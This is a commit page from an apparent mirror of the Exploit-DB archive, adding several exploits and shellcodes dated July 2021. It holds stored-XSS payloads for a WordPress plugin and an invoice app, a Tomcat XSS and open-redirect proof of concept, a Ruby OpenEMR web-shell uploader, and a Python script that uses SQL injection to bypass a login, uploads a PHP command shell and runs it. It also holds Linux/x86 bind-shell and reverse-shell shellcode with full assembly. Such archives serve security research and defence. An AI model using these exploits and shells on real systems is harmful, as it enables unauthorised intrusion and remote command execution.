bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-07-14

Browse source 
8 changes to exploits/shellcodes

Apache Tomcat 9.0.0.M1 - Open Redirect
WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)
Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload

Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
This commit is contained in:
Offensive Security 2021-07-14 05:01:54 +00:00
parent efd4a69880
commit 906bbc4943
10 changed files with 673 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
exploits/multiple/webapps/50118.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784
# Proof of Concept:
# Identify a subfolder within your application
http://example.com/test/
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test
# Browse to the newly created URL and the application will perform a redirection
http://test/

42
exploits/multiple/webapps/50119.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221
# Requirements:
# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.
# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.
# The file must be accessible.
# Proof of Concept:
# Install a Java Runtime Environment (JRE)
# Download a vulnerable version of Tomcat and extract the contents
# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">
# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide
# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
<body>
Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>
Printenv: <!-- #printenv -->
</body>
</html>
# Run Tomcat
cd bin
catalina run
# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E

23
exploits/php/webapps/50120.txt Normal file
View file

@ -0,0 +1,23 @@
# Exploit Title: WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)
# Date: 11/07/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/wpfront-notification-bar/
# Version: 1.9.1.04012
# Tested on Windows
# Category: Web Application
How to reproduce vulnerability:
1. Install WordPress 5.7.2
2. Install and activate *WPFront Notification Bar* plugin.
3. Navigate to *WPFront Notification Bar *>> Setting >> notification bar and
fill the required data and enter the below-mentioned payload into the Custom
CSS user input field.
</textarea><script>prompt(1)</script>
5. You will observe that the payload successfully got stored into the
database and when you are triggering the same functionality in that time
JavaScript payload is executing successfully and we are getting a pop-up.

46
exploits/php/webapps/50121.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 12 July 2021
# Exploit Author: Subhadip Nag (mrl0s3r)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14858/invoice-system-using-phpoop-free-source-code.html
# Tested on: Server: XAMPP
# Description #
Invoice System 1.0 is vulnerable to 'Multiple 'stored cross site scripting (xss) in the Settings option because of insufficient user supplied data.
When anyone visits any other option like(Dashboard,Invoice,Category,Service,Product and also Settings option, our payload will respond as well, and when anyone again Login as Admin the payload works the same as well.
# Proof of Concept (PoC) : Exploit #
1) Goto: http://localhost/simple_invoice/admin/login.php
2) Login: Login as a Admin for given credentials: admin | admin123
3) Goto: Settings option
4) In the System Name & Short Name, Enter the payload:
<script>+-+-1-+-+alert(1)</script>
5) Click Update
6) our XSS attack fired and Stored
7) Wherever we are clicked in any options, noticed that our Payload responding us
8) Goto: http://localhost/simple_invoice/admin/?page=service
9) Click Create New
10) In the Name and Description field, enter the payload:
<<SCRIPT>alert("XSS");//<</SCRIPT>
11) Our XSS attack Successful
12) Goto: http://localhost/simple_invoice/admin/?page=invoice
13) Click Create New
14) In the Customer Name, Unit, Remarks, enter the payload:
<script>alert(1)</script>
15) Our XSS attack Successful
# PoC image
1) https://ibb.co/JpYdZ4F
2) https://ibb.co/brm00dF
3) https://ibb.co/3crYLSZ
4) https://ibb.co/N9m6fy0
5) https://ibb.co/HGNSJDN
6) https://ibb.co/7tyFY1P
7) https://ibb.co/gZ0BvjB
8) https://ibb.co/2S9J6Xn

87
exploits/php/webapps/50122.rb Executable file
View file

@ -0,0 +1,87 @@
# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)
# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)
# Date: 2021-07-05
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml
# Version: < 5.0.1.4 (it means up to 5.0.1.3)
# Tested on: OpenEMR Version 5.0.0.8
# References: https://www.exploit-db.com/exploits/49998
# CVE: CVE-2018-15139
# CWE: CWE-434
# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485
#!/usr/bin/env ruby
require 'pathname'
require 'httpx'
require 'http/form_data'
require 'docopt'
doc = <<~DOCOPT
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution
Source: https://github.com/sec-it/exploit-CVE-2019-14530
Usage:
#{__FILE__} exploit <url> <filename> <username> <password> [--debug]
#{__FILE__} -h | --help
Options:
<url> Root URL (base path) including HTTP scheme, port and root folder
<filename> Filename of the shell to be uploaded
<username> Username of the admin
<password> Password of the admin
--debug Display arguments
-h, --help Show this screen
Examples:
#{__FILE__} exploit http://example.org/openemr shell.php admin pass
#{__FILE__} exploit https://example.org:5000/ shell.php admin pass
DOCOPT
def login(root_url, user, pass, http)
vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default"
params = {
'new_login_session_management' => '1',
'authProvider' => 'Default',
'authUser' => user,
'clearPass' => pass,
'languageChoice' => '1'
}
http.post(vuln_url, form: params).body.to_s
end
def upload(root_url, filepath, http)
vuln_url = "#{root_url}/interface/super/manage_site_files.php"
pn = Pathname.new(filepath)
params = {
form_image: {
content_type: 'application/x-php',
filename: pn.basename.to_s,
body: pn
},
bn_save: 'Save'
}
res = http.post(vuln_url, form: params)
return '[-] File not upload' unless (200..299).include?(res.status)
"[+] File uploaded:\n#{root_url}/sites/default/images/#{pn.basename}"
end
begin
args = Docopt.docopt(doc)
pp args if args['--debug']
if args['exploit']
http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)
login(args['<url>'], args['<username>'], args['<password>'], http)
puts upload(args['<url>'], args['<filename>'], http)
end
rescue Docopt::Exit => e
puts e.message
end

82
exploits/php/webapps/50123.py Executable file
View file

@ -0,0 +1,82 @@
# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload
# Date: 05-07-2021
# Exploit Author: Luca Bernardi - bernardiluca.job at protonmail.com | luca.bernardi at dedagroup.it
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
# POC: https://www.exploit-db.com/exploits/50085
# Tested On: Ubuntu 21.04 + Apache/2.4.46 (Ubuntu)
# Version: 1.0
#======================================================
#imports
from requests_toolbelt.multipart.encoder import MultipartEncoder
import requests
import string
import random
import os
import argparse
#generate random string 8 chars
def randomGen(size=8, chars=string.ascii_lowercase):
return ''.join(random.choice(chars) for _ in range(size))
#generating a random username and a random web shell file
user=randomGen()
shellFile=randomGen()+".php"
#creating a payload for the login
payload = {
"username":"a",
"password":"a' OR 1=1 AND ucat='admin' #"
}
proxies = {"http":"http://127.0.0.1:8080"}
session=requests.Session()
#changeme
urlBase="http://172.27.1.71/Gabage/"
url=urlBase+"login.php"
print("=== executing SQL Injection ===")
req=session.post(url,payload,allow_redirects=False)
cookie=req.headers["Set-Cookie"]
print("=== authenticated admin cookie:" + cookie + " ===")
url=urlBase+"apatient/users.php?user=rayat"
mp_encoder = MultipartEncoder(
fields = {
"fullname":user,
"ucat":"admin",
"contact":"0000000000",
"address":"aaa ave",
"username":user,
"acstatus":"active",
"date":"2021-07-05",
"password":user,
"image":(shellFile,"<?php if(isset($_REQUEST['cmd'])){$cmd = ($_REQUEST['cmd']); system($cmd);die; }?>","application/x-php"),
"submit":""
}
)
headers = {
"Cookie":cookie,
'Content-Type': mp_encoder.content_type
}
print("=== creating user " + user + " and uploading shell " + shellFile +" ===")
req=session.post(url,data=mp_encoder,allow_redirects=False,headers=headers) #,proxies=proxies)
#curl the shell for test
requestUrl = "curl " + urlBase + "apatient/contract/"+shellFile+"?cmd=whoami"
print("=== issuing a whoami: " + requestUrl + " ===")
print("===CURL OUTPUT===")
os.system(requestUrl)

6
files_exploits.csv
View file

@ -44255,3 +44255,9 @@ id,file,description,date,author,type,platform,port
50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php, 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php, 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php,
50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)",2021-07-09,"Subhadip Nag",webapps,php, 50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)",2021-07-09,"Subhadip Nag",webapps,php,
50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",2021-07-13,"Central InfoSec",webapps,multiple,
50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",2021-07-13,"Swapnil Subhash Bodekar",webapps,php,
50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",2021-07-13,"Central InfoSec",webapps,multiple,
50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-07-13,"Subhadip Nag",webapps,php,
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -1038,3 +1038,5 @@ id,file,description,date,author,type,platform
49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64 49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86 49855,shellcodes/linux_x86/49855.c,"Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes)",2021-05-10,"Artur Szymczak",shellcode,linux_x86
49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86
50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",2021-07-13,d7x,shellcode,linux_x86
50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2021-07-13,d7x,shellcode,linux_x86

1 id file description date author type platform
1038 49820 shellcodes/windows_x86-64/49820.c Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) 2021-05-03 boku shellcode windows_x86-64
1039 49855 shellcodes/linux_x86/49855.c Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) 2021-05-10 Artur Szymczak shellcode linux_x86
1040 49976 shellcodes/linux_x86/49976.c Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded) 2021-06-10 d7x shellcode linux_x86
1041 50124 shellcodes/linux_x86/50124.c Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) 2021-07-13 d7x shellcode linux_x86
1042 50125 shellcodes/linux_x86/50125.c Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) 2021-07-13 d7x shellcode linux_x86

195
shellcodes/linux_x86/50124.c Normal file
View file

@ -0,0 +1,195 @@
# Exploit Title: Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)
# Date: 08/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Bind Shell (/bin/sh) with dynamic port binding Null-Free Shellcode (102 bytes)
Usage: gcc -z execstack -o bindshell bindshell.c
./bindshell 7000
Binding to 7000 (0x1b58)
netstat -antlp | grep 7000
tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN 26088/bindshell
nc -nv 127.0.0.1 7000
Connection to 127.0.0.1 7000 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x56\x89\xe1\xcd\x80\x89\xc6\x31\xc9\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf2\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80";
main(int argc, char *argv[])
{
/* Default port at 28th and 29th byte index: \x11\x5c */
// in case no port is provided the default would be used
if (argc < 2) {
printf("No port provided, 4444 (0x115c will be used)\n");
}
else
{
int port = atoi(argv[1]);
printf("Binding to %d (0x%x)\n", port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[28] = (unsigned char){p1};
shellcode[29] = (unsigned char){p2};
// printf("%x %x", shellcode[28], shellcode[29]);
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall BIND (0x02) - int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x02
; pushing arguments to the stack backwards:
; bind(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
; xor edx, edx
push edx
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_LISTEN (0x04) - int listen(int sockfd, int backlog);
mov al, 0x66
mov bl, 0x04
; pushing arguments to the stack backwards:
; listen(sockid, 0);
push edx ; push 0
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; socketcall (0x66)
; syscall SYS_ACCEPT (0x05) - int sock_accept = accept(sockid, 0, 0);
mov al, 0x66
mov bl, 0x05
push edx
push esi ; socket file descriptor saved earlier in esi
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; dup2 (0x3f)
; 0 ; stdin
; dup2 (0x3f)
; 1 ; stdout
; dup2 (0x3f)
; 2 ; stderr
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; (0 - stdin, 1 - stdout, 2 - stderr) dup2 - __NR_dup2 63
; int dup2(int oldfd, int newfd);
; xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
; sub esp, 8 ; reserve some bytes in the stack to work with
push eax ; substituted sub esp, 8 to reduce opcode size
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
***/

174
shellcodes/linux_x86/50125.c Normal file
View file

@ -0,0 +1,174 @@
# Exploit Title: Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)
# Date: 10/07/2021
# Exploit Author: d7x
# Tested on: Ubuntu x86
/***
Linux/x86 Reverse TCP Shell with dynamic IP and port binding Shellcode (tested on Ubuntu 12.04 LTS)
Usage: gcc -z execstack -o shell_reverse_tcp shell_reverse_tcp.c
$ ./shell_reverse_tcp_shellcode 192.168.1.137 4444
Connecting to 192.168.1.236 (0xec01a8c0):4444 (0x115c)
Byte 26: c0
Byte 27: a8
Byte 28: 01
Byte 29: ec
$ nc -nlv 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.137 45219
id
uid=0(root) gid=0(root) groups=0(root)
*** Created by d7x
https://d7x.promiselabs.net
https://www.promiselabs.net ***
***/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at 26th byte; Port at 32nd byte
main(int argc, char *argv[])
{
/* Default IP and port at 26th and 32nd byte index: \x7f\x01\x01\x01 \x11\x5c */
// in case no port is provided the default would be used
if (argc < 3) {
printf("No IP or port provided, 127.1.1.1:4444 (0x7f010101:0x115c) will be used\n");
}
else
{
// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
struct sockaddr_in ipaddr;
inet_aton(argv[1], &ipaddr.sin_addr.s_addr);
int port = atoi(argv[2]);
printf("Connecting to %s (0x%x):%d (0x%x)\n", argv[1], ipaddr.sin_addr.s_addr, port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
// printf("%x %x\n", p1, p2);
shellcode[32] = (unsigned char){p1};
shellcode[33] = (unsigned char){p2};
/* 1st byte: 0xAABBCCDD >> 0 & 0xff
2nd byte: 0xAABBCCDD >> 8 & 0xff
3rd byte: 0xAABBCCDD >> 16 & 0xff
4th byte: 0xAABBCCDD >> 24 & 0xff
*/
int i, a;
for (i = 26, a = 0; i <= 29; i++, a+=8)
{
shellcode[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, shellcode[i]);
}
}
int (*ret)() = (int(*)())shellcode;
ret();
}
/***
; shellcode assembly
global _start:
section .text
_start:
; socketcall (0x66)
; syscall SYS_SOCKET (0x01) - int socket(int domain, int type, int protocol);
xor eax, eax
xor ebx, ebx
mov al, 0x66
mov bl, 0x01
; pushing arguments to the stack backwards: int protocol (PF_INET, SOCK_STREAM, 0)
xor edx, edx
push edx ; int domain
push 0x01 ; SOCK_STREAM
push 0x02 ; PF_INET (AF_INET and PF_INET is the same)
mov ecx, esp
; syscall
int 0x80
; save returned file descriptor from eax into esi for later use
mov esi, eax
; socketcall (0x66)
; syscall SYS_CONNECT (0x03) - int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
mov al, 0x66
mov bl, 0x03
; pushing arguments to the stack backwards:
; connect(sockid, (struct sockaddr *) &addrport, sizeof(addrport));
push 0x0101017f ; 127.1.1.1
push word 0x5c11 ; port 4444
push word 0x02 ; PF_INET
mov ecx, esp
push 0x10 ; sockaddr length
push ecx ; sockaddr pointer
push esi ; saved socket descriptor
mov ecx, esp
; syscall
int 0x80
; dup2 - __NR_dup2 63
; dup2(0), dup2(1), dup2(2)
; (0 - stdin, 1 - stdout, 2 - stderr)
; let's put all this in a loop
xor ecx, ecx
DUPCOUNT:
; int dup2(int oldfd, int newfd);
xor eax, eax
mov al, 0x3f
; ebx (socket descriptor, being copied over from esi saved earlier)
; ecx will be calculated automatically based on the loop value
; xor ebx, ebx
mov ebx, esi ; saved socket descriptor
; syscall
int 0x80
inc cl
cmp cx, 2
jle DUPCOUNT ; count until 2 is reached
; execve (0x0b)
; /bin//sh
xor eax, eax
; xor ebx, ebx
push eax ; reserve some bytes in the stack to work with
mov al, 0x0b
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
xor ecx, ecx
; syscall
int 0x80
***/